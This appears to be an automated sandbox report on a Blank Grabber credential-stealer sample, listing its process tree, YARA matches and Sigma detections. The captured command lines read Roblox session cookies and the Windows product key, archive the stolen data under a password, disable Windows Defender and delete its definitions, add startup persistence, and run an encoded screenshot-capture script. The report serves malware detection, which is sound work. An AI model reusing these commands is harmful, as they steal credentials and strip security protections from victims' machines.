cmd.exe (PID: 5224 cmdline: C:\Windows\system32\cmd.exe /c "getmac" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

getmac.exe (PID: 3656 cmdline: getmac MD5: 7D4B72DFF5B8E98DD1351A401E402C33)

cmd.exe (PID: 5388 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 1692 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 5768 cmdline: C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

attrib.exe (PID: 1832 cmdline: attrib +r C:\Windows\System32\drivers\etc\hosts MD5: 5037D8E6670EF1D89FB6AD435F12A9FD)

cmd.exe (PID: 7320 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 8004 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7624 cmdline: C:\Windows\system32\cmd.exe /c "tasklist /FO LIST" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tasklist.exe (PID: 7776 cmdline: tasklist /FO LIST MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)

cmd.exe (PID: 7896 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 7880 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7964 cmdline: C:\Windows\system32\cmd.exe /c "tree /A /F" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

tree.com (PID: 4660 cmdline: tree /A /F MD5: 9EB969EF56718A6243BF60350CD065F0)

cmd.exe (PID: 7856 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8044 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7748 cmdline: powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 7980 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8112 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7668 cmdline: powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 6184 cmdline: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

rar.exe (PID: 5800 cmdline: C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" * MD5: 9C223575AE5B9544BC3D69AC6364F75E)

cmd.exe (PID: 4144 cmdline: C:\Windows\system32\cmd.exe /c "wmic os get Caption" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7484 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7480 cmdline: wmic os get Caption MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 8124 cmdline: C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8088 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 7384 cmdline: wmic computersystem get totalphysicalmemory MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 3856 cmdline: C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 1832 cmdline: wmic csproduct get uuid MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 5652 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 6808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 180 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER MD5: 04029E121A0CFA5991749937DD22A1D9)

cmd.exe (PID: 3276 cmdline: C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 3360 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WMIC.exe (PID: 4020 cmdline: wmic path win32_VideoController get name MD5: C37F2F4F4B3CD128BDABCAEB2266A785)

cmd.exe (PID: 4140 cmdline: C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8004 cmdline: powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault MD5: 04029E121A0CFA5991749937DD22A1D9)

svchost.exe (PID: 8076 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

cleanup

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\_MEI72722\rarreg.key	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000002.00000003.1416795269.000002162BD6C000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.1868931572.0000021629F34000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.1416947939.000002162BDAA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000002.1870398266.000002162BF00000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.1394231148.00000254B9323000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.1865899522.000002162CDC5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000000.00000003.1394231148.00000254B9325000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.1417333424.000002162BEB5000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
00000002.00000003.1416587840.000002162BD54000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: ahost.exe PID: 7272	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: ahost.exe PID: 7328	JoeSecurity_BlankGrabber	Yara detected Blank Grabber	Joe Security
Process Memory Space: ahost.exe PID: 7328	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: ahost.exe PID: 7328	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 9 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'", CommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ahost.exe", ParentImage: C:\Users\user\Desktop\ahost.exe, ParentProcessId: 7328, ParentProcessName: ahost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\ahost.exe'", ProcessId: 7384, ProcessName: cmd.exe

Sigma detected: Powershell Defender Disable Scan Feature

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ahost.exe", ParentImage: C:\Users\user\Desktop\ahost.exe, ParentProcessId: 7328, ParentProcessName: ahost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All", ProcessId: 7392, ProcessName: cmd.exe

Sigma detected: Rar Usage with Password and Compression Level

Source: Process started

Author: @ROxPinTeddy: Data: Command: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *", CommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *", CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\ahost.exe", ParentImage: C:\Users\user\Desktop\ahost.exe, ParentProcessId: 7328, ParentProcessName: ahost.exe, ProcessCommandLine: C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI72722\rar.exe a -r -hp"blank123" "C:\Users\user\AppData\Local\Temp\p92x0.zip" *", ProcessId: 6184, ProcessName: cmd.exe

Sigma detected: Rare Remote Thread Creation By Uncommon Source Image

Source: Threat created

Author: Perez Diego (@darkquassar), oscd.community: Data: EventID: 8, SourceImage: C:\Windows\System32\wbem\WMIC.exe, SourceProcessId: 7384, StartAddress: 68232B0, TargetImage: C:\Windows\System32\cmd.exe, TargetProcessId: 7384

Sigma detected: Suspicious Encoded PowerShell Command Line

Source: Process started

Author: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious PowerShell Encoded Command Patterns

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFM

Sigma detected: Suspicious Startup Folder Persistence

Source: File created

Author: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\ahost.exe, ProcessId: 7328, TargetFilename: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ?.scr

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4